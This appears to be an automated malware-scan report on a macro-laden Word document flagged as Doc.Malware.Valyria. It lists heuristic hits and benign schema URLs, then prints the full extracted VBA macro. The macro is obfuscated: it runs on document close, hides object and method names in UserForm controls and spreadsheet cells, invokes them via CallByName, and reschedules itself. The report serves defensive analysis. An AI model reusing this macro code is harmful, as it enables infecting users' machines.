MALICIOUS
222
Risk Score
Heuristics 5
-
ClamAV: Doc.Malware.Valyria-10033904-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Valyria-10033904-0
-
VBA project inside OOXML medium 2 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set lb = CreateObject(UserForm1.ComboBox1) -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
p4t = CallByName(Application, oh, 2) -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 7906 bytes |
SHA-256: 1a2003370833daf20a05a364871192e7c587f4518e428d0b2464f62ba82cb261 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public xq, k82dq, obc6n, vsd, bhi
Sub Document_Close()
nnn
End Sub
Sub nnn()
On Error Resume Next
Application.DisplayAlerts = False
Err.Number = 0
UserForm2.ComboBox1.ListIndex = 2
Dim lb
q9 = Application.Options.RevisedPropertiesColor
Set lb = CreateObject(UserForm1.ComboBox1)
lb.DisplayAlerts = False
oh = "visible"
womsg = "OnTime"
Dim p7tdc
ds = Application.Options.InlineConversion
If xe > 1009 Then
kvgkm = Application.Options.PasteSmartStyleBehavior
xe = kvgkm
xe = Application.Options.ShortMenuNames
If q9 > 2985 Then
mq = Application.Options.AutoCreateNewDrawings
q9 = mq
End If
End If
bvsi = 1
k7j = 1
While bvsi <> 0 And k7j < 3
Set p7tdc = lb.Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2)
bvsi = Err.Number
k7j = k7j + 1
Wend
If bvsi <> 0 Then
p4t = CallByName(Application, oh, 2)
If p4t = True Then
Set ehqh = CreateObject(UserForm1.ComboBox3)
ehqh.Documents.Open ActiveDocument.FullName, ReadOnly:=True
h8co = Application.Options.AutoFormatAsYouTypeApplyNumberedLists
If ds > 4406 Then
i83a = Application.Options.AutoFormatAsYouTypeInsertOvers
ds = i83a
End If
yklwg = Application.Options.SavePropertiesPrompt
If h8co > 868 Then
akq = Application.Options.EnableMisusedWordsDictionary
h8co = akq
End If
ehqh.Run "ThisDocument.nnn"
Else
gd1l = Application.Options.PasteAdjustTableFormatting
If yklwg > 4688 Then
te = Application.Options.AutoFormatAsYouTypeFormatListItemBeginning
yklwg = te
End If
UserForm1.ComboBox4 = UserForm1.ComboBox4 & "0"
Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument.nnn"
End If
lb.Quit
Exit Sub
End If
Dim fgpf2
Set fgpf2 = lb.sheets(1)
bkfuu = "'"
ly = lb.sheets(3).Cells(20, 21).Value
k82dq = lb.sheets(2).Cells(149, 23).Value
xq = lb.sheets(1).Cells(71, 3).Value
ar = lb.sheets(2).Cells(181, 22).Value
uc = lb.sheets(3).Cells(218, 2).Value
p5 = lb.sheets(3).Cells(153, 13).Value
jt = lb.sheets(2).Cells(154, 50).Value
an = lb.sheets(3).Cells(167, 36).Value
pl = fgpf2.Cells(87, 6).Value
fzyd = lb.sheets(2).Cells(21, 2).Value
bolca = lb.sheets(1).Cells(101, 42).Value
hvt = lb.sheets(3).Cells(92, 27).Value
qh = Application.Options.ReplaceSelection
If gd1l > 3360 Then
w0d = Application.Options.AutoFormatApplyHeadings
gd1l = w0d
End If
uzqt1 = Application.Options.PasteMergeLists
If qh > 3761 Then
zt = Application.Options.MapPaperSize
qh = zt
End If
ra23q = Application.Options.ArabicMode
If uzqt1 > 1787 Then
sf = Application.Options.AllowCombinedAuxiliaryForms
uzqt1 = sf
End If
edyis = lb.sheets(2).Cells(225, 43).Value
t1 = lb.sheets(3).Cells(177, 40).Value
mf = lb.sheets(3).Cells(64, 34).Value
fkch = lb.sheets(3).Cells(56, 7).Value
nqm54 = lb.sheets(1).Cells(119, 22).Value
d7p0 = lb.sheets(2).Cells(165, 8).Value
f1 = fgpf2.Cells(142, 19).Value
gx = lb.sheets(3).Cells(99, 12).Value
syah9 = lb.sheets(1).Cells(41, 31).Value
ui0z = lb.sheets(2).Cells(246, 15).Value
bhi = fgpf2.Cells(120, 25).Value
kcjo = fgpf2.Cells(254, 1).Value
a7091 = lb.sheets(2).Cells(138, 3).Value
pt = lb.sheets(1).Cells(173, 17).Value
qddz5 = CallByName(lb, ly, 2)
Set gjnc = UserForm1.Controls.Add("Forms.ComboBox.1")
gjnc.Value = jt & qddz5 & gx
Set lf = UserForm1.Controls.Add("Forms.ComboBox.1")
lf.Value = a7091
CallByName CreateObject(bolca), edyis, 1, gjnc, uc, lf
vd = Application.Options.ShowFormatError
If ra23q > 3706 Then
nnefu = Application.Options.RevisedPropertiesMark
ra23q = nnefu
End If
Set g6x4 = CreateObject(ui0z)
Set d5x = CallByName(g6x4, mf, 2)
Set lxj2b = CallByName(d5x, syah9, 1)
Set d7p0 = CallByName(g6x4, d7p0, 2)
kvcx = Application.Options.PasteMergeFromPPT
If vd > 2148 Then
n9dkz = Application.Options.TypeNReplace
vd = n9dkz
End If
Set vsd = g6x4
Set ar = CallByName(d7p0, ar, 2)
Set pl = CallByName(ar, pl, 2)
Set jbe = CallByName(pl, pt, 1, f1)
jhr = Application.Options.MultipleWordConversionsMode
Set xq = CallByName(jbe, xq, 2)
t1 = CallByName(xq, t1, 2)
CallByName xq, hvt, 1, 1, t1
Set obc6n = UserForm1.Controls.Add("Forms.ComboBox.1")
ahu = Application.Options.DisableFeaturesbyDefault
If jhr > 1411 Then
fh5q = Application.Options.AutoFormatReplaceHyperlinks
jhr = fh5q
End If
obc6n.Value = p5 & nqm54
UserForm3.ComboBox1 = fzyd
vs42 = Application.Options.AutoFormatAsYouTypeMatchParentheses
If ahu > 4670 Then
klhv = Application.Options.GridDistanceHorizontal
ahu = klhv
End If
obc6n.Value = kcjo
UserForm4.ComboBox1 = UserForm3.ComboBox1
UserForm3.ComboBox1 = t1
g6x4 = Nothing
p7tdc = Nothing
fgpf2 = Nothing
d5x = Nothing
lxj2b = Nothing
d7p0 = Nothing
ar = Nothing
eyju = Application.Options.EnableSound
If vs42 > 3378 Then
ee8xj = Application.Height
vs42 = ee8xj
End If
pl = Nothing
jbe = Nothing
xq = Nothing
vsd = Nothing
hi = Application.Options.AutoFormatAsYouTypeDeleteAutoSpaces
If eyju > 232 Then
ig = Application.Options.DefaultBorderLineStyle
eyju = ig
End If
DoEvents
CallByName lb, an, 1
lb = Nothing
DoEvents
CallByName CreateObject(bolca), fkch, 1, jt & qddz5 & gx
End Sub
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{B01E4432-5C29-4ECB-9F53-BFED705DF47D}{16570F76-963E-41B3-9B5F-9A3C53236EC1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{17B6A17C-DF4F-4AD2-8F00-12045B533855}{81566F54-5CA9-488B-8438-2C30A3A1C179}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
On Error GoTo ErrorHandler
ye8kw = UserForm2.Controls.Count - 1
cz2d = Application.Options.DisableFeaturesbyDefault
If io > 1650 Then
kj = Application.Options.RevisedLinesMark
io = kj
End If
If Len(UserForm1.ComboBox4) > 10 Then
ye8kw = ye8kw * 2
End If
fhiq7 = ""
For io = 1 To ye8kw Step 2
fhiq7 = fhiq7 & UserForm2.Controls.Item(io)
Next
ComboBox1.AddItem "ek"
ComboBox1.AddItem "zo"
ComboBox1.AddItem fhiq7
krtl = Application.Options.AutoCreateNewDrawings
If cz2d > 3717 Then
b4d7 = Application.Options.PasteMergeLists
cz2d = b4d7
End If
ComboBox1.AddItem "x9se1"
Exit Sub
ErrorHandler:
End Sub
Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{30DCD49A-512F-49AB-9150-16C448490F42}{D68C741F-0FC9-4788-8E89-C5CBD9E8B7B4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
nze9l = Application.Options.FormatScanning
If obc6n > 4623 Then
xyux6 = Application.Options.PasteSmartStyleBehavior
obc6n = xyux6
End If
CallByName ActiveDocument.xq, ActiveDocument.k82dq, VbMethod, ActiveDocument.obc6n
End Sub
Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{70A24809-CD99-46FC-B0DD-15A2D43511BF}{EB6FB524-7CA1-4280-BAFB-8AAEF3D4177C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
CallByName ActiveDocument.vsd, ActiveDocument.bhi, VbMethod, ActiveDocument.obc6n
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 40960 bytes |
SHA-256: e0d7035fa1e2bbf34cfdca266bb9df13d38022b711cce40ac3cebce76529946c |
|||
|
Detection
ClamAV:
Doc.Malware.Valyria-10033904-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.